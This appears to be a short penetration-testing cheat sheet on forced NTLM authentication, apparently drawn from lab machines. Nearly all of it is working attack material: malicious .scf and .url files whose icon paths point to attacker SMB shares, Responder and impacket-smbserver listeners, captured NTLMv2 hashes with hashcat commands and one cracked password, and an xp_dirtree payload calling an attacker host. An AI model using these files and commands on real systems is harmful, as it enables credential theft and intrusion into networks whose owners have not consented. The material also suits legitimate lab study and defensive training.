It can either exploit a vulnerability or leverage credentials to gain access.
> cat fa.scf
[Shell]
Command=2
IconFile=\\10.10.14.8\tools\nc.ico
[Taskbar]
Command=ToggleDesktop
sudo responder -I tun0
[SMB] NTLMv2-SSP Client : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:451bdf5b37308f2d:D10F44CB278831231592D6B94ED74614:0101000000000000008BD3228AE3D7018C171E0C015E8A7B00000000020008005800310059004A0001001E00570049004E002D0050004C004D005600410046004C00310048004600340004003400570049004E002D0050004C004D005600410046004C0031004800460034002E005800310059004A002E004C004F00430041004C00030014005800310059004A002E004C004F00430041004C00050014005800310059004A002E004C004F00430041004C0007000800008BD3228AE3D701060004000200000008003000300000000000000000000000002000003C71A28B04C2DCB184AB0F5B692EB7458B019B6A866DD66C917136AF69EC69030A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003800000000000000000000000000
hashcat -m5600 SMB-Relay-SMB-10.10.11.106.txt /usr/share/wordlists/rockyou.txt --force
TONY::DRIVER:efc9b5e721ae752b:d38bd53794bb9dd185ca56d24820d13c:0101000000000000d426fc6defe3d70159fee0a7b6c28ecf0000000002000c0044005200490056004500520001000c0044005200490056004500520004000c0044005200490056004500520003000c0044005200490056004500520007000800d426fc6defe3d701060004000200000008003000300000000000000000000000002000003c71a28b04c2dcb184ab0f5b692eb7458b019b6a866dd66c917136af69ec69030a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003800000000000000000000000000:liltony
> cat link.url
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\192.168.49.165\%USERNAME%.icon
IconIndex=1
sudo responder -I tun0
impacket-smbserver share ./ -smb2support
exec("net use \\\\192.168.49.71\\share")
[*] tony::JACKO:aaaaaaaaaaaaaaaa:7e88523703460e622d90489b6e830cca:010100000000000080482e242ff5d701e327f0ca541d182400000000010010004a006100420044004f005a006f007200030010004a006100420044004f005a006f00720002001000740065006d004e006800500074006c0004001000740065006d004e006800500074006c000700080080482e242ff5d70106000400020000000800300030000000000000000000000000300000c854ea0a8f4dcdd8bb4201a7ed1c553cc740fa87dbd6763c7063e1ec205803dd0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00340039002e00370031000000000000000000
hashcat -m 5600 "tony::JACKO:aaaaaaaaaaaaaaaa:7e88523703460e622d90489b6e830cca:010100000000000080482e242ff5d701e327f0ca541d182400000000010010004a006100420044004f005a006f007200030010004a006100420044004f005a006f00720002001000740065006d004e006800500074006c0004001000740065006d004e006800500074006c000700080080482e242ff5d70106000400020000000800300030000000000000000000000000300000c854ea0a8f4dcdd8bb4201a7ed1c553cc740fa87dbd6763c7063e1ec205803dd0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00340039002e00370031000000000000000000" --force /usr/share/wordlists/rockyou.txt -w 4
SQL> xp_dirtree "\\attackerip\fakeshare"
https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication